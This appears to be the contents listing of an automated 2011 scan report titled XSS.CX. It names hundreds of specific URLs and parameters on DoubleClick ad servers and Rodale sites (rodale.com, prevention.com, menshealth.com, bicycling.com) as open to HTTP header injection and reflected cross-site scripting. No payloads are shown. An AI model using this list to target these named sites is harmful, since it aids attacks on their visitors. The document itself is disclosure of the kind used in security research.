XSS, HTTP Header Injection Cross Site Scripting, CWE-79, CWE-113, DORK Report for March 11, 2011

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Fri Mar 11 11:36:42 CST 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Loading

1. HTTP header injection

1.1. http://ad.doubleclick.net/2521745/newspeckle2.html [REST URL parameter 1]

1.2. http://ad.doubleclick.net/2521745/newspeckle2.html [REST URL parameter 2]

1.3. http://ad.doubleclick.net/2521746/bluecoverforma2.html [REST URL parameter 1]

1.4. http://ad.doubleclick.net/2521746/bluecoverforma2.html [REST URL parameter 2]

1.5. http://ad.doubleclick.net/ad/N2434.127885.1691942218421/B5055470.38 [REST URL parameter 1]

1.6. http://ad.doubleclick.net/ad/N2724.rodale.com/B4504763.19 [REST URL parameter 1]

1.7. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.10 [REST URL parameter 1]

1.8. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.2 [REST URL parameter 1]

1.9. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.3 [REST URL parameter 1]

1.10. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.4 [REST URL parameter 1]

1.11. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.5 [REST URL parameter 1]

1.12. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.7 [REST URL parameter 1]

1.13. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.8 [REST URL parameter 1]

1.14. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.9 [REST URL parameter 1]

1.15. http://ad.doubleclick.net/ad/N5767.womenshealthmagOX4554/B4627079.35 [REST URL parameter 1]

1.16. http://ad.doubleclick.net/ad/N6138.127885.WOMENSHEALTH/B5295230.17 [REST URL parameter 1]

1.17. http://ad.doubleclick.net/ad/N6138.6483.MENSHEALTH/B5295230.20 [REST URL parameter 1]

1.18. http://ad.doubleclick.net/ad/N6138.6483.MENSHEALTH/B5295230.24 [REST URL parameter 1]

1.19. http://ad.doubleclick.net/ad/N6138.6483.MENSHEALTH/B5295230.25 [REST URL parameter 1]

1.20. http://ad.doubleclick.net/ad/N6357.menshealth.comOX4549/B4645123.52 [REST URL parameter 1]

1.21. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [REST URL parameter 1]

1.22. http://ad.doubleclick.net/adj/bicycling/home [REST URL parameter 1]

1.23. http://ad.doubleclick.net/adj/menshealth/home [REST URL parameter 1]

1.24. http://ad.doubleclick.net/adj/organicgardening/home [REST URL parameter 1]

1.25. http://ad.doubleclick.net/adj/prevention/home [REST URL parameter 1]

1.26. http://ad.doubleclick.net/adj/prevention/lifelongbeauty [REST URL parameter 1]

1.27. http://ad.doubleclick.net/adj/rodale/fitness [REST URL parameter 1]

1.28. http://ad.doubleclick.net/adj/runnersworld/community [REST URL parameter 1]

1.29. http://ad.doubleclick.net/adj/runnersworld/home [REST URL parameter 1]

1.30. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

1.31. http://ad.doubleclick.net/imp [REST URL parameter 1]

1.32. http://amch.questionmarket.com/adsc/d876089/3/885674/adscout.php [ES cookie]

1.33. http://amch.questionmarket.com/adsc/d876089/3/885678/adscout.php [ES cookie]

1.34. http://amch.questionmarket.com/adsc/d876089/3/885679/adscout.php [ES cookie]

1.35. http://amch.questionmarket.com/adsc/d876089/8/40909683/decide.php [ES cookie]

1.36. http://amch.questionmarket.com/adscgen/st.php [code parameter]

1.37. http://amch.questionmarket.com/adscgen/st.php [site parameter]

1.38. http://amch.questionmarket.com/adscgen/sta.php [code parameter]

1.39. http://amch.questionmarket.com/adscgen/sta.php [site parameter]

1.40. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

1.41. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

1.42. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

2. Cross-site scripting (reflected)

2.1. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [adurl parameter]

2.2. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [adurl parameter]

2.3. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [ai parameter]

2.4. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [client parameter]

2.5. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [num parameter]

2.6. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [sig parameter]

2.7. http://ad.doubleclick.net/adi/N5295.134426.GOOGLEDISPLAYNETWOR/B5081081.19 [sz parameter]

2.8. http://ad.turn.com/server/pixel.htm [fpid parameter]

2.9. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

2.10. http://button.topsy.com/widget/retweet-json [callback parameter]

2.11. http://button.topsy.com/widget/retweet-json [id parameter]

2.12. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

2.13. http://ds.addthis.com/red/psi/sites/www.prevention.com/p.json [callback parameter]

2.14. http://recipes.rodale.com/homepage.aspx [name of an arbitrarily supplied request parameter]

2.15. http://remedies.rodale.com/favicon.ico [REST URL parameter 1]

2.16. http://sitelife.prevention.com/ver1.0/Summary/SummaryArticlesMostCommented [plckElementId parameter]

2.17. http://sitelife.prevention.com/ver1.0/Summary/SummaryArticlesMostRecommended [plckElementId parameter]

2.18. http://sitelife.prevention.com/ver1.0/Summary/SummaryBlogsRecent [plckElementId parameter]

2.19. http://sitelife.prevention.com/ver1.0/Summary/SummaryBlogsRecentPosts [plckElementId parameter]

2.20. http://sitelife.runnersworld.com/ver1.0/Summary/SummaryBlogsRecentPosts [plckElementId parameter]

2.21. http://video.bicycling.com/decor/javascript/elements.js [REST URL parameter 1]

2.22. http://video.bicycling.com/decor/javascript/magnify_pipeline.js [REST URL parameter 1]

2.23. http://video.bicycling.com/decor/javascript/magnify_stats.js [REST URL parameter 1]

2.24. http://video.bicycling.com/decor/live/transparent.gif [REST URL parameter 1]

2.25. http://video.bicycling.com/decor/track/dot.gif [REST URL parameter 1]

2.26. http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2 [REST URL parameter 1]

2.27. http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2 [REST URL parameter 2]

2.28. http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2 [name of an arbitrarily supplied request parameter]

2.29. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 1]

2.30. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 2]

2.31. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 4]

2.32. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 4]

2.33. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 5]

2.34. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 5]

2.35. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [REST URL parameter 6]

2.36. http://video.bicycling.com/embed/player/container/1075/949/C5QKZB153SRSPSH2 [referrer parameter]

2.37. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 1]

2.38. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 2]

2.39. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 4]

2.40. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 4]

2.41. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 5]

2.42. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 5]

2.43. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [REST URL parameter 6]

2.44. http://video.bicycling.com/embed/player/container/298/275/C5QKZB153SRSPSH2 [referrer parameter]

2.45. http://video.bicycling.com/favicon.ico [REST URL parameter 1]

2.46. http://video.bicycling.com/services/usage_request [REST URL parameter 1]

2.47. http://video.bicycling.com/services/usage_request [REST URL parameter 2]

2.48. http://www.menshealth.com/cda/expertlandingpage.do [site parameter]

2.49. http://www.menshealth.com/cda/expertlandingpage.do [site parameter]

2.50. http://www.menshealth.com/cda/expertoverview.do [site parameter]

2.51. http://www.menshealth.com/cda/expertoverview.do [site parameter]

2.52. http://www.menshealth.com/cda/featured_video.do [site parameter]

2.53. http://www.menshealth.com/cda/featured_video.do [site parameter]

2.54. http://www.menshealth.com/cda/toolsandquizzes_index.do [category parameter]

2.55. http://www.menshealth.com/cda/toolsandquizzes_index.do [category parameter]

2.56. http://www.menshealth.com/cda/toolsandquizzes_index.do [topic parameter]

2.57. http://www.menshealth.com/downloads/all/ [cm_sp parameter]

2.58. http://www.menshealth.com/downloads/all/ [download_type parameter]

2.59. http://www.menshealth.com/downloads/all/ [download_type parameter]

2.60. http://www.menshealth.com/downloads/all/ [name of an arbitrarily supplied request parameter]

2.61. http://www.menshealth.com/downloads/fitness/ [name of an arbitrarily supplied request parameter]

2.62. http://www.menshealth.com/downloads/sex-and-relationships/ [name of an arbitrarily supplied request parameter]

2.63. http://www.menshealth.com/fitness/cardio-activities/recent-10 [REST URL parameter 2]

2.64. http://www.menshealth.com/fitness/getting-started/recent-10 [REST URL parameter 2]

2.65. http://www.menshealth.com/fitness/muscle-building/recent-10 [REST URL parameter 2]

2.66. http://www.menshealth.com/fitness/sports-injuries/recent-10 [REST URL parameter 2]

2.67. http://www.menshealth.com/mhlists/Best_and_Worst_Cities_for_Men_2010/ [name of an arbitrarily supplied request parameter]

2.68. http://www.menshealth.com/mhlists/change_your_workout/ [name of an arbitrarily supplied request parameter]

2.69. http://www.menshealth.com/mhlists/lose_weight/index.php [name of an arbitrarily supplied request parameter]

2.70. http://www.menshealth.com/mhlists/sculpt_rock_hard_abs/index.php [name of an arbitrarily supplied request parameter]

2.71. http://www.menshealth.com/mhlists/women_s_secrets/ [name of an arbitrarily supplied request parameter]

2.72. http://www.prevention.com/cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/makeup/bobbi.brown [REST URL parameter 5]

2.73. http://www.prevention.com/cda/article/tricks-of-my-trade/75bc88dc78803110VgnVCM10000013281eac____/lifelong.beauty/makeup/bobbi.brown [REST URL parameter 6]

2.74. http://www.prevention.com/cda/categorypage.do [category parameter]

2.75. http://www.prevention.com/cda/categorypage.do [category parameter]

2.76. http://www.prevention.com/cda/categorypage.do [category parameter]

2.77. http://www.prevention.com/cda/categorypage.do [channel parameter]

2.78. http://www.prevention.com/cda/categorypage.do [channel parameter]

2.79. http://www.prevention.com/cda/categorypage.do [channel parameter]

2.80. http://www.prevention.com/cda/categorypage.do [channel parameter]

2.81. http://www.prevention.com/cda/channelpage.do [channel parameter]

2.82. http://www.prevention.com/cda/channelpage.do [channel parameter]

2.83. http://www.prevention.com/cda/channelpage.do [channel parameter]

2.84. http://www.prevention.com/cda/channelpage.do [channel parameter]

2.85. http://www.prevention.com/cda/newslettersignup.do [source parameter]

2.86. http://www.prevention.com/cda/newslettersignup.do [source parameter]

2.87. http://www.prevention.com/cda/toolfinder.do [channel parameter]

2.88. http://www.prevention.com/cda/toolfinder.do [channel parameter]

2.89. http://www.prevention.com/cda/toolfinder.do [channel parameter]

2.90. http://www.prevention.com/cda/toolfinder.do [channel parameter]

2.91. http://www.prevention.com/cda/toolfinder.do [name of an arbitrarily supplied request parameter]

2.92. http://www.prevention.com/cda/toolfinder.do [tf_type parameter]

2.93. http://www.prevention.com/cda/toolfinder.do [tf_type parameter]

2.94. http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ [REST URL parameter 3]

2.95. http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ [REST URL parameter 3]

2.96. http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ [REST URL parameter 4]

2.97. http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ [REST URL parameter 5]

2.98. http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ [REST URL parameter 6]

2.99. http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ [REST URL parameter 3]

2.100. http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ [REST URL parameter 3]

2.101. http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ [REST URL parameter 4]

2.102. http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ [REST URL parameter 5]

2.103. http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ [REST URL parameter 6]

2.104. http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ [REST URL parameter 3]

2.105. http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ [REST URL parameter 3]

2.106. http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ [REST URL parameter 4]

2.107. http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ [REST URL parameter 5]

2.108. http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ [REST URL parameter 6]

2.109. http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ [REST URL parameter 3]

2.110. http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ [REST URL parameter 3]

2.111. http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ [REST URL parameter 4]

2.112. http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ [REST URL parameter 5]

2.113. http://www.prevention.com/health/fitness/find-a-workout/total-body-toning/article/31e69dc91e22e110VgnVCM10000013281eac____/ [REST URL parameter 6]

2.114. http://www.prevention.com/health/health/a-spoonful-of-health/ [REST URL parameter 3]

2.115. http://www.prevention.com/health/health/a-spoonful-of-health/ [REST URL parameter 3]

2.116. http://www.prevention.com/health/health/health-concerns/cold-flu [REST URL parameter 3]

2.117. http://www.prevention.com/health/health/health-concerns/cold-flu [REST URL parameter 3]

2.118. http://www.prevention.com/health/health/health-concerns/cold-flu [REST URL parameter 4]

2.119. http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ [REST URL parameter 3]

2.120. http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ [REST URL parameter 3]

2.121. http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ [REST URL parameter 4]

2.122. http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ [REST URL parameter 5]

2.123. http://www.prevention.com/health/health/healthy-living/carrie-ann-inaba-s-health-and-fitness-tips/article/16ee7ede8d77e210VgnVCM10000030281eac____ [REST URL parameter 6]

2.124. http://www.prevention.com/health/health/healthy-living/pets [REST URL parameter 3]

2.125. http://www.prevention.com/health/health/healthy-living/pets [REST URL parameter 3]

2.126. http://www.prevention.com/health/health/healthy-living/pets [REST URL parameter 4]

2.127. http://www.prevention.com/health/news-voices/videos [REST URL parameter 3]

2.128. http://www.prevention.com/health/news-voices/videos [REST URL parameter 3]

2.129. http://www.rodale.com/ [name of an arbitrarily supplied request parameter]

2.130. http://www.rodale.com/1,6597,8-114,00.html [REST URL parameter 1]

2.131. http://www.rodale.com/1,6597,8-114,00.html [name of an arbitrarily supplied request parameter]

2.132. http://www.rodale.com/benefits-walking [REST URL parameter 1]

2.133. http://www.rodale.com/benefits-walking [name of an arbitrarily supplied request parameter]

2.134. http://www.rodale.com/cas [REST URL parameter 1]

2.135. http://www.rodale.com/caslogin [REST URL parameter 1]

2.136. http://www.rodale.com/chemicals-plastic [REST URL parameter 1]

2.137. http://www.rodale.com/chemicals-plastic [name of an arbitrarily supplied request parameter]

2.138. http://www.rodale.com/contact [REST URL parameter 1]

2.139. http://www.rodale.com/contact [name of an arbitrarily supplied request parameter]

2.140. http://www.rodale.com/cookware-comparison [REST URL parameter 1]

2.141. http://www.rodale.com/cookware-comparison [name of an arbitrarily supplied request parameter]

2.142. http://www.rodale.com/corp/sub/0,,1-28,00.html [REST URL parameter 1]

2.143. http://www.rodale.com/corp/sub/0,,1-28,00.html [REST URL parameter 2]

2.144. http://www.rodale.com/corp/sub/0,,1-28,00.html [REST URL parameter 3]

2.145. http://www.rodale.com/corp/sub/0,,1-28,00.html [name of an arbitrarily supplied request parameter]

2.146. http://www.rodale.com/corp/sub/1,1874,1-28,00.html [REST URL parameter 1]

2.147. http://www.rodale.com/corp/sub/1,1874,1-28,00.html [REST URL parameter 2]

2.148. http://www.rodale.com/corp/sub/1,1874,1-28,00.html [REST URL parameter 3]

2.149. http://www.rodale.com/corp/sub/1,1874,1-28,00.html [name of an arbitrarily supplied request parameter]

2.150. http://www.rodale.com/cracker-recipes [REST URL parameter 1]

2.151. http://www.rodale.com/cracker-recipes [name of an arbitrarily supplied request parameter]

2.152. http://www.rodale.com/crib-safety [REST URL parameter 1]

2.153. http://www.rodale.com/crib-safety [name of an arbitrarily supplied request parameter]

2.154. http://www.rodale.com/edible-insects [REST URL parameter 1]

2.155. http://www.rodale.com/edible-insects [name of an arbitrarily supplied request parameter]

2.156. http://www.rodale.com/environment [REST URL parameter 1]

2.157. http://www.rodale.com/environment [name of an arbitrarily supplied request parameter]

2.158. http://www.rodale.com/files/rodalenews_favicon.ico [REST URL parameter 1]

2.159. http://www.rodale.com/files/rodalenews_favicon.ico [REST URL parameter 2]

2.160. http://www.rodale.com/fitness [REST URL parameter 1]

2.161. http://www.rodale.com/fitness [name of an arbitrarily supplied request parameter]

2.162. http://www.rodale.com/food [REST URL parameter 1]

2.163. http://www.rodale.com/food [name of an arbitrarily supplied request parameter]

2.164. http://www.rodale.com/green-kitchen-safety-tips [REST URL parameter 1]

2.165. http://www.rodale.com/green-kitchen-safety-tips [name of an arbitrarily supplied request parameter]

2.166. http://www.rodale.com/green-school-supplies [REST URL parameter 1]

2.167. http://www.rodale.com/green-school-supplies [name of an arbitrarily supplied request parameter]

2.168. http://www.rodale.com/happiest-place-live-united-states [REST URL parameter 1]

2.169. http://www.rodale.com/happiest-place-live-united-states [name of an arbitrarily supplied request parameter]

2.170. http://www.rodale.com/health [REST URL parameter 1]

2.171. http://www.rodale.com/health [name of an arbitrarily supplied request parameter]

2.172. http://www.rodale.com/heart-attack-triggers [REST URL parameter 1]

2.173. http://www.rodale.com/heart-attack-triggers [name of an arbitrarily supplied request parameter]

2.174. http://www.rodale.com/how-prevent-hangover [REST URL parameter 1]

2.175. http://www.rodale.com/how-prevent-hangover [name of an arbitrarily supplied request parameter]

2.176. http://www.rodale.com/lean-belly-prescription-0 [REST URL parameter 1]

2.177. http://www.rodale.com/lean-belly-prescription-0 [name of an arbitrarily supplied request parameter]

2.178. http://www.rodale.com/living [REST URL parameter 1]

2.179. http://www.rodale.com/living [name of an arbitrarily supplied request parameter]

2.180. http://www.rodale.com/natural-sleep-remedies [REST URL parameter 1]

2.181. http://www.rodale.com/natural-sleep-remedies [name of an arbitrarily supplied request parameter]

2.182. http://www.rodale.com/news [REST URL parameter 1]

2.183. http://www.rodale.com/news [name of an arbitrarily supplied request parameter]

2.184. http://www.rodale.com/our-board-advisors [REST URL parameter 1]

2.185. http://www.rodale.com/our-board-advisors [name of an arbitrarily supplied request parameter]

2.186. http://www.rodale.com/our-site-policies [REST URL parameter 1]

2.187. http://www.rodale.com/our-site-policies [name of an arbitrarily supplied request parameter]

2.188. http://www.rodale.com/plastic-bag-ban [REST URL parameter 1]

2.189. http://www.rodale.com/plastic-bag-ban [name of an arbitrarily supplied request parameter]

2.190. http://www.rodale.com/plastic-free [REST URL parameter 1]

2.191. http://www.rodale.com/plastic-free [name of an arbitrarily supplied request parameter]

2.192. http://www.rodale.com/point-view [REST URL parameter 1]

2.193. http://www.rodale.com/point-view [name of an arbitrarily supplied request parameter]

2.194. http://www.rodale.com/recipe_query_redirect.php [REST URL parameter 1]

2.195. http://www.rodale.com/rodale-story [REST URL parameter 1]

2.196. http://www.rodale.com/rodale_coreg/post [REST URL parameter 1]

2.197. http://www.rodale.com/rodale_coreg/post [REST URL parameter 2]

2.198. http://www.rodale.com/rodalecom-team [REST URL parameter 1]

2.199. http://www.rodale.com/rodalecom-team [name of an arbitrarily supplied request parameter]

2.200. http://www.rodale.com/rss-feeds [REST URL parameter 1]

2.201. http://www.rodale.com/rss-feeds [name of an arbitrarily supplied request parameter]

2.202. http://www.rodale.com/rss.xml [REST URL parameter 1]

2.203. http://www.rodale.com/search/google_appliance [REST URL parameter 1]

2.204. http://www.rodale.com/search/google_appliance [REST URL parameter 2]

2.205. http://www.rodale.com/search/google_appliance [name of an arbitrarily supplied request parameter]

2.206. http://www.rodale.com/search/google_appliance/BPA [REST URL parameter 1]

2.207. http://www.rodale.com/search/google_appliance/BPA [REST URL parameter 2]

2.208. http://www.rodale.com/search/google_appliance/BPA [REST URL parameter 2]

2.209. http://www.rodale.com/search/google_appliance/BPA [REST URL parameter 3]

2.210. http://www.rodale.com/search/google_appliance/BPA [REST URL parameter 3]

2.211. http://www.rodale.com/search/google_appliance/BPA [name of an arbitrarily supplied request parameter]

2.212. http://www.rodale.com/search/google_appliance/Cleaning [REST URL parameter 1]

2.213. http://www.rodale.com/search/google_appliance/Cleaning [REST URL parameter 2]

2.214. http://www.rodale.com/search/google_appliance/Cleaning [REST URL parameter 2]

2.215. http://www.rodale.com/search/google_appliance/Cleaning [REST URL parameter 3]

2.216. http://www.rodale.com/search/google_appliance/Cleaning [REST URL parameter 3]

2.217. http://www.rodale.com/search/google_appliance/Cleaning [name of an arbitrarily supplied request parameter]

2.218. http://www.rodale.com/search/google_appliance/Food+Safety [REST URL parameter 1]

2.219. http://www.rodale.com/search/google_appliance/Food+Safety [REST URL parameter 2]

2.220. http://www.rodale.com/search/google_appliance/Food+Safety [REST URL parameter 2]

2.221. http://www.rodale.com/search/google_appliance/Food+Safety [REST URL parameter 3]

2.222. http://www.rodale.com/search/google_appliance/Food+Safety [REST URL parameter 3]

2.223. http://www.rodale.com/search/google_appliance/Food+Safety [name of an arbitrarily supplied request parameter]

2.224. http://www.rodale.com/search/google_appliance/Organic+Food [REST URL parameter 1]

2.225. http://www.rodale.com/search/google_appliance/Organic+Food [REST URL parameter 2]

2.226. http://www.rodale.com/search/google_appliance/Organic+Food [REST URL parameter 2]

2.227. http://www.rodale.com/search/google_appliance/Organic+Food [REST URL parameter 3]

2.228. http://www.rodale.com/search/google_appliance/Organic+Food [REST URL parameter 3]

2.229. http://www.rodale.com/search/google_appliance/Organic+Food [name of an arbitrarily supplied request parameter]

2.230. http://www.rodale.com/search/google_appliance/Organic+Gardening [REST URL parameter 1]

2.231. http://www.rodale.com/search/google_appliance/Organic+Gardening [REST URL parameter 2]

2.232. http://www.rodale.com/search/google_appliance/Organic+Gardening [REST URL parameter 2]

2.233. http://www.rodale.com/search/google_appliance/Organic+Gardening [REST URL parameter 3]

2.234. http://www.rodale.com/search/google_appliance/Organic+Gardening [REST URL parameter 3]

2.235. http://www.rodale.com/search/google_appliance/Organic+Gardening [name of an arbitrarily supplied request parameter]

2.236. http://www.rodale.com/search/google_appliance/Pesticides [REST URL parameter 1]

2.237. http://www.rodale.com/search/google_appliance/Pesticides [REST URL parameter 2]

2.238. http://www.rodale.com/search/google_appliance/Pesticides [REST URL parameter 2]

2.239. http://www.rodale.com/search/google_appliance/Pesticides [REST URL parameter 3]

2.240. http://www.rodale.com/search/google_appliance/Pesticides [REST URL parameter 3]

2.241. http://www.rodale.com/search/google_appliance/Pesticides [name of an arbitrarily supplied request parameter]

2.242. http://www.rodale.com/search/google_appliance/Recipes [REST URL parameter 1]

2.243. http://www.rodale.com/search/google_appliance/Recipes [REST URL parameter 2]

2.244. http://www.rodale.com/search/google_appliance/Recipes [REST URL parameter 2]

2.245. http://www.rodale.com/search/google_appliance/Recipes [REST URL parameter 3]

2.246. http://www.rodale.com/search/google_appliance/Recipes [REST URL parameter 3]

2.247. http://www.rodale.com/search/google_appliance/Recipes [name of an arbitrarily supplied request parameter]

2.248. http://www.rodale.com/search/google_appliance/Stress [REST URL parameter 1]

2.249. http://www.rodale.com/search/google_appliance/Stress [REST URL parameter 2]

2.250. http://www.rodale.com/search/google_appliance/Stress [REST URL parameter 2]

2.251. http://www.rodale.com/search/google_appliance/Stress [REST URL parameter 3]

2.252. http://www.rodale.com/search/google_appliance/Stress [REST URL parameter 3]

2.253. http://www.rodale.com/search/google_appliance/Stress [name of an arbitrarily supplied request parameter]

2.254. http://www.rodale.com/search/google_appliance/Weight+Loss [REST URL parameter 1]

2.255. http://www.rodale.com/search/google_appliance/Weight+Loss [REST URL parameter 2]

2.256. http://www.rodale.com/search/google_appliance/Weight+Loss [REST URL parameter 2]

2.257. http://www.rodale.com/search/google_appliance/Weight+Loss [REST URL parameter 3]

2.258. http://www.rodale.com/search/google_appliance/Weight+Loss [REST URL parameter 3]

2.259. http://www.rodale.com/search/google_appliance/Weight+Loss [name of an arbitrarily supplied request parameter]

2.260. http://www.rodale.com/sites/all/themes/rodalenews/static/rodale-shopping.html [REST URL parameter 1]

2.261. http://www.rodale.com/sites/all/themes/rodalenews/static/rodale-shopping.html [REST URL parameter 2]

2.262. http://www.rodale.com/sites/all/themes/rodalenews/static/rodale-shopping.html [REST URL parameter 3]

2.263. http://www.rodale.com/sites/all/themes/rodalenews/static/rodale-shopping.html [REST URL parameter 4]

2.264. http://www.rodale.com/sites/all/themes/rodalenews/static/rodale-shopping.html [REST URL parameter 5]

2.265. http://www.rodale.com/sites/all/themes/rodalenews/static/rodale-shopping.html [REST URL parameter 6]

2.266. http://www.rodale.com/topic/acid-reflux [REST URL parameter 1]

2.267. http://www.rodale.com/topic/acid-reflux [REST URL parameter 2]

2.268. http://www.rodale.com/topic/acid-reflux [name of an arbitrarily supplied request parameter]

2.269. http://www.rodale.com/topic/addadhd [REST URL parameter 1]

2.270. http://www.rodale.com/topic/addadhd [REST URL parameter 2]

2.271. http://www.rodale.com/topic/addadhd [name of an arbitrarily supplied request parameter]

2.272. http://www.rodale.com/topic/aging [REST URL parameter 1]

2.273. http://www.rodale.com/topic/aging [REST URL parameter 2]

2.274. http://www.rodale.com/topic/aging [name of an arbitrarily supplied request parameter]

2.275. http://www.rodale.com/topic/air-pollution-0 [REST URL parameter 1]

2.276. http://www.rodale.com/topic/air-pollution-0 [REST URL parameter 2]

2.277. http://www.rodale.com/topic/air-pollution-0 [name of an arbitrarily supplied request parameter]

2.278. http://www.rodale.com/topic/alcohol [REST URL parameter 1]

2.279. http://www.rodale.com/topic/alcohol [REST URL parameter 2]

2.280. http://www.rodale.com/topic/alcohol [name of an arbitrarily supplied request parameter]

2.281. http://www.rodale.com/topic/allergies [REST URL parameter 1]

2.282. http://www.rodale.com/topic/allergies [REST URL parameter 2]

2.283. http://www.rodale.com/topic/allergies [name of an arbitrarily supplied request parameter]

2.284. http://www.rodale.com/topic/alternative-medicine [REST URL parameter 1]

2.285. http://www.rodale.com/topic/alternative-medicine [REST URL parameter 2]

2.286. http://www.rodale.com/topic/alternative-medicine [name of an arbitrarily supplied request parameter]

2.287. http://www.rodale.com/topic/anger-management [REST URL parameter 1]

2.288. http://www.rodale.com/topic/anger-management [REST URL parameter 2]

2.289. http://www.rodale.com/topic/anger-management [name of an arbitrarily supplied request parameter]

2.290. http://www.rodale.com/topic/antibacterial-soaps-and-cleaners [REST URL parameter 1]

2.291. http://www.rodale.com/topic/antibacterial-soaps-and-cleaners [REST URL parameter 2]

2.292. http://www.rodale.com/topic/antibacterial-soaps-and-cleaners [name of an arbitrarily supplied request parameter]

2.293. http://www.rodale.com/topic/antioxidants-0 [REST URL parameter 1]

2.294. http://www.rodale.com/topic/antioxidants-0 [REST URL parameter 2]

2.295. http://www.rodale.com/topic/antioxidants-0 [name of an arbitrarily supplied request parameter]

2.296. http://www.rodale.com/topic/anxiety [REST URL parameter 1]

2.297. http://www.rodale.com/topic/anxiety [REST URL parameter 2]

2.298. http://www.rodale.com/topic/anxiety [name of an arbitrarily supplied request parameter]

